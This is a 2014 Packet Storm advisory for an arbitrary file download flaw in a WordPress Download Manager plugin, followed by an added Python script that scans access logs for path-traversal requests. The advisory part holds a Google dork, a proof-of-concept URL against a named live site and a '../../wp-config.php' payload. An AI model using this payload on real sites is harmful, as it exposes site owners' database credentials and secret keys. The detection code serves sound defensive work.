WordPress Download Manager Arbitrary File Download

2014-10-26T00:00:00
ID PACKETSTORM:128852
Type packetstorm
Reporter Hugo Santiago dos Santos
Modified 2014-10-26T00:00:00

Description

`# WordPress Download Manager Plugin - Arbitrary File Download  
# CWE: CWE-98  
# Risk: High  
# Author: Hugo Santiago dos Santos  
# Contact: hugo.s@linuxmail.org  
# Date: 25/10/2014  
# Vendor Homepage: https://wordpress.org/plugins/download-manager/  
# Tested on: Windows 7 and GNU/Linux  
# Google Dork: inurl:/plugins/download-manager/  
  
# VUL: /views/file_download.php?fname=  
  
or:  
  
/file_download.php?fname=  
  
# PoC :   
  
http://triec.ca/wp-content/plugins/document_manager/views/file_download.php?fname=../../wp-config.php  
  
  
# Exploit: On a website that uses /plugins/download-manager/, add to the link: /views/file_download.php?fname=../../wp-config.php  
  
`
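
A defender's view of the request pattern above, as an added example that is not part of the original advisory: a Python scan of web-server access logs for `fname` values sent to `file_download.php` that leave the download directory. It goes beyond the literal `../../` case to cover URL-encoded, double-encoded and absolute-path values; the combined log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Assumption: the web server writes Apache/nginx "combined" format access logs.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3})')
SCRIPT = "file_download.php"  # endpoint named in the advisory
PARAM = "fname"               # parameter named in the advisory

# Constructed sample lines (documentation IP ranges), not real traffic.
BASE = "/wp-content/plugins/download-manager/views/file_download.php"
SAMPLE_LOG = [
    f'192.0.2.10 - - [26/Oct/2014:10:00:00 +0000] "GET {BASE}?fname=../../wp-config.php HTTP/1.1" 200 3021',
    f'192.0.2.10 - - [26/Oct/2014:10:00:05 +0000] "GET {BASE}?fname=%2e%2e%2f%2e%2e%2fwp-config.php HTTP/1.1" 200 3021',
    f'198.51.100.7 - - [26/Oct/2014:10:01:00 +0000] "GET {BASE}?fname=%252e%252e%252fwp-config.php HTTP/1.1" 404 210',
    f'203.0.113.4 - - [26/Oct/2014:10:02:00 +0000] "GET {BASE}?fname=report.pdf HTTP/1.1" 200 88112',
]

def is_traversal(value):
    """True when an fname value would resolve outside the download directory."""
    # Decode repeatedly so %2e%2e%2f and double-encoded %252e forms are caught.
    for _ in range(3):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    value = value.replace("\\", "/")  # Windows separators
    if "\x00" in value or value.startswith("/") or re.match(r"^[A-Za-z]:", value):
        return True  # NUL byte, absolute path or drive letter
    return ".." in value.split("/")

def scan(lines):
    """Return (client, status, fname decoded once) for each suspicious request."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, _method, target, status = m.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith("/" + SCRIPT):
            continue
        # parse_qs percent-decodes each value once before we inspect it.
        for value in parse_qs(url.query, keep_blank_values=True).get(PARAM, []):
            if is_traversal(value):
                hits.append((client, int(status), value))
    return hits

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

A 200 status on a flagged request suggests the file was served; if the target was `wp-config.php`, rotate the database credentials and secret keys it contains.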